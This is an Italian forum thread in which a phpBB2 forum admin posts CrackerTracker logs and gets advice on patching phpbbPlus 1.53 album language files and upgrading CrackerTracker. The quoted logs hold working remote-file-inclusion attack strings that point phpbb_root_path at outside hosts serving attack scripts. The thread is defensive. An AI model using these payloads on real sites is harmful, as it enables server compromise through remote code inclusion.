- Home
- Categorie
- Coding e Sistemistica
- CMS & Piattaforme Self-Hosted
- Log strani... Attacchi hacker?
-
Log strani... Attacchi hacker?
Salve a tutti.
Ho CrackerTracker ed un forum phpbb2 e noto che da qualche tempo il CrackerTracker mi segnala diversi logfile di attacco e l'ip degli autori...Ora mi chiedo: come devo reagire???
Gli attacchi sono:
pic_id=17//language/lang_english/lang_main_album.php?phpbb_root_path=http://futurehousingsystems.com/images/control.txt?
cat_id-1&user_id=5/language/lang_english/lang_main_album.php?phpbb_root_path=http://web2.0sites.com/wp-content/uploads/2006/10/prs.txt?
sid=5fd2be95a589035a32459630b6a07b75//language/lang_english/lang_main_album.php?phpbb_root_path=%22Poweredhttp://www.palmer-werbeart.de//components/scan.txt?
phpbb_root_path=http://www.sexofv.com/galerias/rubias/monica-1/full/prs.txt?
Questi sono solo alcuni....
Datemi un parere...
-
i log indicano chiaramente tentativi di sfruttare vulnerabilità di PhpBB
gli IP sono ovviamente di proxy, magari usano una botnet, quindi è inutile pensare di poter risalire agli aggressori
l'unica cosa da fare è mantenere aggiornato PhpBB e verificare sul loro forum eventuali avvisi di sicurezza
se aggiorni il CMS è difficile che possano crearti problemi
-
Ciao robert13, sposto la discussione in PhpBB, dove potrai avere più pareri
-
@robert13 said:
Salve a tutti.
Ho CrackerTracker ed un forum phpbb2 e noto che da qualche tempo il CrackerTracker mi segnala diversi logfile di attacco e l'ip degli autori...Ora mi chiedo: come devo reagire???
Gli attacchi sono:
pic_id=17//language/lang_english/lang_main_album.php?phpbb_root_path=http://futurehousingsystems.com/images/control.txt?
cat_id-1&user_id=5/language/lang_english/lang_main_album.php?phpbb_root_path=http://web2.0sites.com/wp-content/uploads/2006/10/prs.txt?
sid=5fd2be95a589035a32459630b6a07b75//language/lang_english/lang_main_album.php?phpbb_root_path=%22Poweredhttp://www.palmer-werbeart.de//components/scan.txt?
phpbb_root_path=http://www.sexofv.com/galerias/rubias/monica-1/full/prs.txt?
Questi sono solo alcuni....
Datemi un parere...
Alcuni di questi colpiscono le vulnerabilità in phpbbplus 1.53 sehai effettuato il fix come detto su http://www.phpbb2.de non dovresti avere problemi!
PS: Aggiorna il ctracker alla versione 5.0.4!!!!!!
-
ciao robert13, assicurati di aver letto gli articoli nella prima pagina di questa sezione del forum, e assicurati di aver installato i fix per i recenti bug scoperti che hanno causato molti attacchi anche ad altra gente.
-
@Jantima said:
ciao robert13, assicurati di aver letto gli articoli nella prima pagina di questa sezione del forum, e assicurati di aver installato i fix per i recenti bug scoperti che hanno causato molti attacchi anche ad altra gente.
Inoltre la miglior cosa è procedere all'interno della Plus all'installazione (aggiornamento) di Ctraker alla versione 5.0.4, in Phpbbplus è presente la 2.0 
-
Ho la 4.1.7 ma è un lavoraccio aggiornarla alla 5.0.4
Cosa rischio se un attacco di questo va a buon fine?
-
ho la 4.17
-
Ascolta ma hai PhpbbPlus?
O utilizzi Phpbb2 normale?
Altra cosa hai il Photo Album di Smartor?
-
ho phpbb2 plus 153 ...
non ho pulsanti per l'aggiornamento automatico, quindi dovrei rimuovere l'attuale cracker e installare il nuovo...
o c'è altro che non so?
GRAZIE A TUTTI.
-
Stai attento, se hai phpbbplus 1.53 assicurati di aver fixato i bug presenti nei file language che sono vulnerabili!
-
Non l'ho fatto... Dove li trovo???
è una domanda un po stupida, ma ho cercato già nel sito tedesco, ma non capisco un granche...
-
Ho trovato nel gt forum, ed ho corretto i lang_mine_album e lang_admin_album per ogni lingua.
Questo mi basta?
-
@robert13 said:
Ho trovato nel gt forum, ed ho corretto i lang_mine_album e lang_admin_album per ogni lingua.
Questo mi basta?
Perfetto
Fai anche questa modifica
http://www.giorgiotave.it/forum/phpbb/52911-urgente-fix-links-mod-phpbbplus-e-vulnerabile.html
Ora stai + tranquillo in questo ambito
-
Grazie,
ho trovato risposte più esaurienti qui che che sul forum phpbb.itCiao a tutti e grazie a master1986
-
Scusate se riapro, ma la fix:
che ho inserito mi da errore di sintassi:
***/************************************************** ************************* * lang_main_album.php [Italian] * ------------------- * begin : Sunday, February 02, 2003 * copyright : (C) 2003 Smartor * email : [EMAIL="smartor_xp@hotmail.com"]smartor_xp@hotmail.com[/EMAIL] * * $Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $ * translation : Antonio Mercurio (roland@phpbbplus.it) [www.phpbbplus.it](http://www.phpbbplus.it/) ************************************************** **************************/* **if ( !defined('IN_PHPBB') ) { die('Hacking attempt'); exit; ***/************************************************** ************************* * * This program is free software;you can redistribute it *and*/*or* modify * it under the terms of the GNU General Public License *as* published by * the Free Software Foundation;either version 2 of the License, *or* * (at your option) any later version. * ************************************************** *************************/* *//--- Album Category Hierarchy : begin* *//--- version : 1.10* *include*($phpbb_root_path.'language/lang_italian/lang_hierarchy_album.' . $phpEx); *//--- Album Category Hierarchy : end*** ```Ho sbagliato in qualcosa?
-
Certo ci sono delle stringhe sbagliate
guarda:
*** * $Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $
-
translation : Antonio Mercurio (roland@phpbbplus.it) [www.phpbbplus.it](http://www.phpbbplus.it/)
************************************************** /
if ( !defined('IN_PHPBB') )
{
die('Hacking attempt');
exit; /******************** *************************
*- This program is free software;you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation;either version 2 of the License, or
- (at your option) any later version.
************************************************** **********************/
Devi modificarlo così:
<?php
/***************************************************************************- lang_main_album.php [Italian]
-
-
begin : Sunday, February 02, 2003 -
copyright : (C) 2003 Smartor -
email : smartor_xp@hotmail.com -
$Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $ -
translation : Antonio Mercurio (roland@phpbbplus.it) www.phpbbplus.it
*/
/
*- This program is free software;you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation;either version 2 of the License, or
- (at your option) any later version.
***************************************************************************/
if ( !defined('IN_PHPBB') )
{
die('Hacking attempt');
exit;
}//--- Album Category Hierarchy : begin
//--- version : 1.10
include($phpbb_root_path.'language/lang_italian/lang_hierarchy_album.' . $phpEx);
//--- Album Category Hierarchy : end
-
-
Provo, grazie.
-
Ok...
Riapro questo argomento per segnalare il link da qui è possibile aggiornare il ctracker alla versione 5.0.4 (tramite installazione, durata 2 minuti, senza l'infinita modifica file...)
Attenzione: l'aggiornamento è solo per la versione di ctracker di phpbb2 plus 153a .
link:http://www.phpbb2.de/dload.php?action=file&file_id=834
al 63 esimo attacco in un mese
ho aggiornato... non si sa mai...Saluto tutti